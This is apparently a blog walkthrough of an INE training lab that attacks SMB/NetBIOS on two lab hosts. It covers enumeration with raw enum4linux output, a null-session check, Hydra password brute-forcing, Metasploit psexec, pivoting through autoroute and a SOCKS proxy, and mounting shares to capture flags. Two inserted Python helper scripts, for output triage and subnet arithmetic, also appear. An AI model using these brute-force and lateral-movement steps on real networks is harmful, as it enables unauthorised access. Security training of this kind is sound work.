0xMat10
14 min read · Apr 25, 2023

NetBIOS Hacking

Welcome!

Welcome, N1NJ10, to a new writeup, this time for the NetBIOS Hacking lab.

In this lab we will learn to enumerate the SMB service and exploit it using different brute-forcing and exploitation tools. It also covers pivoting and how to use the net utility to mount the shared drives in the pivoted network.

Lab Environment

In this lab environment, the user will access a Kali GUI instance. A vulnerable SMB service can be accessed using the tools installed on Kali at http://demo.ine.local and http://demo1.ine.local.

Objective: Exploit both targets and find the flags!

Tools

The best tools for this lab are:

  • Metasploit Framework
  • Nmap
  • Hydra
  • Proxychains

If you don't know what NetBIOS is, I advise you to read this article first to understand what NetBIOS is and how we deal with this protocol.

Let’s start

As we can see, we have two targets, http://demo.ine.local and http://demo1.ine.local. Can we reach them or not?

[Screenshot: footprinting]

Well, we can reach one of them, http://demo.ine.local, and can only resolve the IP address of the other one, http://demo1.ine.local.

Let's focus on the first one, which we can reach.

Nmap is a good way to start:

nmap -Pn -p- -T4 --disable-arp-ping -n -sV -sT 10.5.25.62
[Screenshot: Nmap result]

We can see that ports 139 and 445 are open. Good news: now we know that this machine runs NetBIOS/SMB.

Let's enumerate the NetBIOS/SMB service with enum4linux:

enum4linux -a demo.ine.local

We can see the following result:

root@INE:~# enum4linux -a demo.ine.local 
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Apr 23 01:41:48 2023

==========================
| Target Information |
==========================
Target ........... demo.ine.local
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


======================================================
| Enumerating Workgroup/Domain on demo.ine.local |
======================================================
[E] Can't find workgroup/domain


==============================================
| Nbtstat Information for demo.ine.local |
==============================================
Looking up status of 10.5.25.62
No reply from 10.5.25.62

=======================================
| Session Check on demo.ine.local |
=======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server demo.ine.local allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

=============================================
| Getting domain SID for demo.ine.local |
=============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
result was NT_STATUS_ACCESS_DENIED
[+] Can't determine if host is part of domain or part of a workgroup

========================================
| OS information on demo.ine.local |
========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for demo.ine.local from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for demo.ine.local from srvinfo:
DEMO.INE.LOCAL Wk Sv NT SNT
platform_id : 500
os version : 6.3
server type : 0x9003

===============================
| Users on demo.ine.local |
===============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x1 RID: 0x3f1 acb: 0x00000210 Account: admin Name: (null) Desc: (null)
index: 0x2 RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x3 RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x4 RID: 0x3f2 acb: 0x00000210 Account: root Name: (null) Desc: (null)

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
user:[admin] rid:[0x3f1]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[root] rid:[0x3f2]

===========================================
| Share Enumeration on demo.ine.local |
===========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
do_connect: Connection to demo.ine.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
Downloads Disk
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
Public Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available


[+] Attempting to map shares on demo.ine.local
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/ADMIN$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/C$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Documents Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Downloads Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/IPC$ Mapping: OK Listing: DENIED
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/print$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//demo.ine.local/Public Mapping: DENIED, Listing: N/A

======================================================
| Password Policy Information for demo.ine.local |
======================================================


[+] Attaching to demo.ine.local using a NULL share

[+] Trying protocol 139/SMB...

[!] Protocol failed: Cannot request session (Called Name:DEMO.INE.LOCAL)

[+] Trying protocol 445/SMB...

[+] Found domain(s):

[+] ATTACKDEFENSE
[+] Builtin

[+] Password Info for Domain: ATTACKDEFENSE

[+] Minimum password length: None
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


================================
| Groups on demo.ine.local |
================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:
group:[Access Control Assistance Operators] rid:[0x243]
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[Cryptographic Operators] rid:[0x239]
group:[Distributed COM Users] rid:[0x232]
group:[Event Log Readers] rid:[0x23d]
group:[Guests] rid:[0x222]
group:[Hyper-V Administrators] rid:[0x242]
group:[IIS_IUSRS] rid:[0x238]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Log Users] rid:[0x22f]
group:[Performance Monitor Users] rid:[0x22e]
group:[Power Users] rid:[0x223]
group:[Print Operators] rid:[0x226]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[Remote Desktop Users] rid:[0x22b]
group:[Remote Management Users] rid:[0x244]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Performance Log Users' (RID: 559) has member: Could not connect to server 10.5.25.62
Group 'Performance Log Users' (RID: 559) has member: The username or password was not correct.
Group 'Performance Log Users' (RID: 559) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Event Log Readers' (RID: 573) has member: Could not connect to server 10.5.25.62
Group 'Event Log Readers' (RID: 573) has member: The username or password was not correct.
Group 'Event Log Readers' (RID: 573) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Access Control Assistance Operators' (RID: 579) has member: Could not connect to server 10.5.25.62
Group 'Access Control Assistance Operators' (RID: 579) has member: The username or password was not correct.
Group 'Access Control Assistance Operators' (RID: 579) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Replicator' (RID: 552) has member: Could not connect to server 10.5.25.62
Group 'Replicator' (RID: 552) has member: The username or password was not correct.
Group 'Replicator' (RID: 552) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Backup Operators' (RID: 551) has member: Could not connect to server 10.5.25.62
Group 'Backup Operators' (RID: 551) has member: The username or password was not correct.
Group 'Backup Operators' (RID: 551) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Remote Access Servers' (RID: 575) has member: Could not connect to server 10.5.25.62
Group 'RDS Remote Access Servers' (RID: 575) has member: The username or password was not correct.
Group 'RDS Remote Access Servers' (RID: 575) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Network Configuration Operators' (RID: 556) has member: Could not connect to server 10.5.25.62
Group 'Network Configuration Operators' (RID: 556) has member: The username or password was not correct.
Group 'Network Configuration Operators' (RID: 556) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Power Users' (RID: 547) has member: Could not connect to server 10.5.25.62
Group 'Power Users' (RID: 547) has member: The username or password was not correct.
Group 'Power Users' (RID: 547) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Hyper-V Administrators' (RID: 578) has member: Could not connect to server 10.5.25.62
Group 'Hyper-V Administrators' (RID: 578) has member: The username or password was not correct.
Group 'Hyper-V Administrators' (RID: 578) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Users' (RID: 545) has member: Could not connect to server 10.5.25.62
Group 'Users' (RID: 545) has member: The username or password was not correct.
Group 'Users' (RID: 545) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'IIS_IUSRS' (RID: 568) has member: Could not connect to server 10.5.25.62
Group 'IIS_IUSRS' (RID: 568) has member: The username or password was not correct.
Group 'IIS_IUSRS' (RID: 568) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Remote Desktop Users' (RID: 555) has member: Could not connect to server 10.5.25.62
Group 'Remote Desktop Users' (RID: 555) has member: The username or password was not correct.
Group 'Remote Desktop Users' (RID: 555) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Endpoint Servers' (RID: 576) has member: Could not connect to server 10.5.25.62
Group 'RDS Endpoint Servers' (RID: 576) has member: The username or password was not correct.
Group 'RDS Endpoint Servers' (RID: 576) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Guests' (RID: 546) has member: Could not connect to server 10.5.25.62
Group 'Guests' (RID: 546) has member: The username or password was not correct.
Group 'Guests' (RID: 546) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'RDS Management Servers' (RID: 577) has member: Could not connect to server 10.5.25.62
Group 'RDS Management Servers' (RID: 577) has member: The username or password was not correct.
Group 'RDS Management Servers' (RID: 577) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Distributed COM Users' (RID: 562) has member: Could not connect to server 10.5.25.62
Group 'Distributed COM Users' (RID: 562) has member: The username or password was not correct.
Group 'Distributed COM Users' (RID: 562) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Cryptographic Operators' (RID: 569) has member: Could not connect to server 10.5.25.62
Group 'Cryptographic Operators' (RID: 569) has member: The username or password was not correct.
Group 'Cryptographic Operators' (RID: 569) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Certificate Service DCOM Access' (RID: 574) has member: Could not connect to server 10.5.25.62
Group 'Certificate Service DCOM Access' (RID: 574) has member: The username or password was not correct.
Group 'Certificate Service DCOM Access' (RID: 574) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Print Operators' (RID: 550) has member: Could not connect to server 10.5.25.62
Group 'Print Operators' (RID: 550) has member: The username or password was not correct.
Group 'Print Operators' (RID: 550) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Administrators' (RID: 544) has member: Could not connect to server 10.5.25.62
Group 'Administrators' (RID: 544) has member: The username or password was not correct.
Group 'Administrators' (RID: 544) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Remote Management Users' (RID: 580) has member: Could not connect to server 10.5.25.62
Group 'Remote Management Users' (RID: 580) has member: The username or password was not correct.
Group 'Remote Management Users' (RID: 580) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'Performance Monitor Users' (RID: 558) has member: Could not connect to server 10.5.25.62
Group 'Performance Monitor Users' (RID: 558) has member: The username or password was not correct.
Group 'Performance Monitor Users' (RID: 558) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting local groups:
group:[WinRMRemoteWMIUsers__] rid:[0x3e8]

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 574.
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: Could not connect to server 10.5.25.62
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: The username or password was not correct.
Group 'WinRMRemoteWMIUsers__' (RID: 1000) has member: Connection failed: NT_STATUS_LOGON_FAILURE
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 614.
Group 'None' (RID: 513) has member: Could not connect to server 10.5.25.62
Group 'None' (RID: 513) has member: The username or password was not correct.
Group 'None' (RID: 513) has member: Connection failed: NT_STATUS_LOGON_FAILURE

=========================================================================
| Users on demo.ine.local via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.

===============================================
| Getting printer info for demo.ine.local |
===============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Sun Apr 23 01:42:11 2023

root@INE:~#

From the previous result we can see that we have the users admin, Administrator, Guest and root. We may have a null session here, because we could log in with no credentials and the IPC$ share was mapped.

Note: if you don't know what a null session is, or what IPC$ is, look here for more details.

Let's test this with the smbclient tool:
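As an added example (not part of the lab or this writeup), here is a small Python triage script that parses the kind of enum4linux output shown above and turns it into the findings list a defender would want: null session accepted, shares mappable anonymously, user names disclosed, and the weak password policy (no minimum length, no lockout threshold, complexity disabled) that makes online password guessing cheap. The sample input is a constructed excerpt of the output above; the regexes are written for this enum4linux v0.8.9 line format.

```python
import re

# Constructed excerpt of the enum4linux output shown in the writeup.
SAMPLE_OUTPUT = """\
[+] Server demo.ine.local allows sessions using username '', password ''
user:[admin] rid:[0x3f1]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[root] rid:[0x3f2]
//demo.ine.local/ADMIN$ Mapping: DENIED, Listing: N/A
//demo.ine.local/Documents Mapping: DENIED, Listing: N/A
//demo.ine.local/IPC$ Mapping: OK Listing: DENIED
[+] Minimum password length: None
[+] Password Complexity Flags: 000000
[+] Account Lockout Threshold: None
"""

USER_RE = re.compile(r"^user:\[(?P<name>[^\]]+)\] rid:\[(?P<rid>0x[0-9a-f]+)\]")
SHARE_RE = re.compile(r"^//[^/]+/(?P<share>\S+) Mapping: (?P<map>\w+),? Listing: (?P<list>\S+)")
POLICY_RE = re.compile(
    r"^\[\+\] (?P<key>Minimum password length|Account Lockout Threshold|"
    r"Password Complexity Flags): (?P<val>.+)$"
)


def parse_enum4linux(text):
    """Pull the security-relevant facts out of enum4linux text output."""
    info = {"null_session": False, "users": {}, "shares": {}, "policy": {}}
    for line in text.splitlines():
        if "allows sessions using username ''" in line:
            info["null_session"] = True          # anonymous logon accepted
        elif (m := USER_RE.match(line)):
            info["users"][m["name"]] = int(m["rid"], 16)   # RID as integer
        elif (m := SHARE_RE.match(line)):
            info["shares"][m["share"]] = (m["map"], m["list"])
        elif (m := POLICY_RE.match(line)):
            info["policy"][m["key"]] = m["val"].strip()
    return info


def triage(info):
    """Turn parsed facts into findings a defender should fix."""
    findings = []
    if info["null_session"]:
        findings.append("null session: anonymous SMB logon accepted")
    for share, (mapping, _listing) in info["shares"].items():
        if mapping == "OK":
            findings.append(f"share {share} mappable anonymously")
    if info["users"]:
        findings.append("user list disclosed anonymously: " + ", ".join(sorted(info["users"])))
    pol = info["policy"]
    if pol.get("Minimum password length") in ("None", "0"):
        findings.append("no minimum password length")
    if pol.get("Account Lockout Threshold") in ("None", "0"):
        findings.append("no account lockout threshold: online guessing is unthrottled")
    if pol.get("Password Complexity Flags") == "000000":
        findings.append("password complexity disabled")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_enum4linux(SAMPLE_OUTPUT)):
        print("[!]", finding)
```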

smbclient -N -L 10.5.30.121    # 10.5.30.121 is demo.ine.local; -N skips the password prompt (null session)

Note: the machine crashed many times, so the IP may change between some commands.

[Screenshot: smbclient result]

Pingo, we have a null session here. We only need valid credentials to use the psexec exploit and get control over the machine.

So we have usernames from enum4linux, and we can brute-force with them. You can use Nmap's NSE scripts or any other method, but I prefer Hydra for this task:

hydra -L Users.txt -P <ANY_PASSWORD_LIST> smb://demo.ine.local    # -L: user list, -P: password list
[Screenshot: hydra result]

Pingo, we now have the Administrator account's password.

Now we can run the psexec module in Metasploit (exploit/windows/smb/psexec).

[Screenshot: set options]

Give it a run !!


Pingo, now we are in!!

But we are not done yet; now the second task starts.

We can't access demo1.ine.local from our machine. Let's see if we can access it from this victim machine:

ping demo1.ine.local (or its IP)

Note: we can't ping it by name, because this machine does not resolve the name via DNS, so I use the IP I got from the first ping I did above.

So this machine has another NIC on a private LAN that we can't access directly. Let's look with ipconfig:

ipconfig
[Screenshot: eth0]

eth0 (Interface 12) is the NIC on the network we want to reach, so we can add a route to it with the autoroute module from Metasploit:

run autoroute -s 10.5.27.211/20

Note: I use a /20 prefix because the netmask is 255.255.240.0; for more info, look here.
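Added example, not from the writeup: the arithmetic behind the /20 choice in the note above. Given an interface address and the netmask 255.255.240.0, it derives the CIDR network to hand to autoroute, rejects non-contiguous masks (a common typo when reading ipconfig), and checks that a target address is actually covered by that route. The interface address is assumed to be the demo1 address used in the command above, since the ipconfig output itself is only a screenshot.

```python
def ip_to_int(addr):
    """Dotted IPv4 string to a 32-bit integer, with range checking."""
    parts = [int(p) for p in addr.split(".")]
    if len(parts) != 4 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError(f"bad IPv4 address: {addr}")
    return (parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]


def int_to_ip(n):
    return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def mask_for_prefix(prefix):
    """32-bit mask with `prefix` leading ones (prefix 0..32)."""
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF


def is_contiguous_mask(mask):
    """A valid netmask is some ones followed only by zeros."""
    m = ip_to_int(mask)
    return m == mask_for_prefix(bin(m).count("1"))


def netmask_to_prefix(mask):
    """255.255.240.0 -> 20; refuses masks like 255.0.255.0."""
    if not is_contiguous_mask(mask):
        raise ValueError(f"non-contiguous netmask: {mask}")
    return bin(ip_to_int(mask)).count("1")


def route_for(interface_ip, mask):
    """Network in CIDR form, as `run autoroute -s` expects it."""
    prefix = netmask_to_prefix(mask)
    net = ip_to_int(interface_ip) & mask_for_prefix(prefix)
    return f"{int_to_ip(net)}/{prefix}"


def covers(route, target_ip):
    """True if target_ip lies inside the route's network."""
    net_str, prefix = route.split("/")
    mask = mask_for_prefix(int(prefix))
    return (ip_to_int(target_ip) & mask) == (ip_to_int(net_str) & mask)


if __name__ == "__main__":
    # Assumed interface address (the demo1 address from the writeup) and the
    # netmask from the note above.
    route = route_for("10.5.27.211", "255.255.240.0")
    print("run autoroute -s", route)                 # 10.5.16.0/20
    print("demo1 reachable via route:", covers(route, "10.5.27.211"))
```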

[Screenshot: autoroute result]

Now we can access this network from Metasploit only, but I want to access it from my normal terminal.

So I used the SOCKS proxy server module from Metasploit (auxiliary/server/socks_proxy).

Note: you must know your default SOCKS port in proxychains (the Tor default). You can find it with this command:

tail -n 5 /etc/proxychains4.conf

9050 is our default port.

Now we are ready to start the SOCKS proxy server module.

[Screenshot: server is running]

Good, now we can do whatever we want from our machine to demo1.ine.local through the proxy server.

Let's scan it:

proxychains nmap -sT -Pn -sV --disable-arp-ping -T4 -n demo1.ine.local

It has port 445 open, so that means it has NetBIOS/SMB too.

Now it is time to grab our flags.

I started searching for the first flag on the first victim machine (demo.ine.local) and found it in the Documents directory.

[Screenshot: Flag_1]

Let's see what is on the second one with the net view command:

net view 10.5.27.211
[Screenshot: what!!!]

We received "Access is denied" even though we are root (SYSTEM). This means we probably should migrate to another process.

So I decided to migrate to the explorer.exe process.

Note: if you don't know what process migration is, why I chose explorer.exe, or what that process is, read this.

migrate -N explorer.exe
[Screenshot: migrate]

Let's see if we can use net view now.


We can use the net view command now. We have the Documents and K shares. Let's see what disks exist on this machine with diskpart:

diskpart
list disk
[Screenshot: disk 0]

OK, we have one disk, named Disk 0. We can map the two shares over NetBIOS/SMB with net use:

net use <DRIVE_LETTER>: \\<IP>\<SHARE_NAME>
[Screenshot: we get them]

Now we have them. I found the second flag on the D drive (Documents).


I enjoyed the lab, and will post more labs and other security stuff in the future.

0xMat10

Maybe it's vulnerable maybe it's rude Gotta devil in your memory It's shellcode Executing My gadget gonna ROP Reaching out the 0xFFFFFFFF Got your kernel mode